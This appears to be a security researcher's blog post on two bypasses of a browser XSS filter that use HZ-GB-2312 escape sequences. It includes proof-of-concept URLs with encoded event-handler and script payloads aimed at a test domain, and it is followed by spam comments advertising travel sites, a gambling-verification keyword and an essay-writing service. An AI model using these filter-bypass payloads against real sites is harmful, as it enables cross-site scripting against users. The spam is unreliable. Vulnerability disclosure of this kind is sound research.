To use this vector, we need the target page's Content-Type header which charset is not specified in.
Bypass 1
PoC:http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonmouseover=alert(1)%3EAAA
No user interaction version:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
"~[0x0A]" is HZ-GB-2312 escape sequence. It seems that XSS filter makes an exception for "~[0x0A]" .
If Content-Type header has proper charset, it does not work:
http://vulnerabledoma.in/char_test?charset=utf-8&body=%3Cx~%0Aonmouseover=alert(1)%3EAAA
On the other hand, if meta tag has proper charset, it still works:
http://vulnerabledoma.in/xssable?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
Bypass 2
"~{" is also HZ-GB-2312 escape sequence. We can use this for bypass. We can call same-origin method in string literal.PoC is here:
http://l0.cm/xssfilter_hz_poc.html
Please click the "go" button. You can confirm element.click method is called.
"click" is called from the following code:
http://vulnerabledoma.in/xss_js?q=%22%3B~{valueOf:opener.button.click}//
<script>var q="";~{valueOf:opener.button.click}//"</script>
Also, you can use "toString":
http://vulnerabledoma.in/xss_js?q=%22%3B~{toString:opener.button.click}//
<script>var q="";~{toString:opener.button.click}//"</script>
That's all. See you next month!
Những Chuyến Đi Cuộc Đời
ReplyDeleteNgau Hung Du Lich
Tri Thuc Du Lich
Book Ve Du Lich Gia Re
Wow! This can be one particular of the most useful blogs We have ever arrive across on this subject 먹튀검증
ReplyDeleteHey! There you are! Our service https://expertpaperwriter.com/papernow-org-review/ focus on keeping our prices low, but unlike other academic writing services online, we never sacrifice quality for the sake of price. We thrive on service orientation; our mission is to increase customer loyalty by providing nonparallel services and after sales support.
ReplyDelete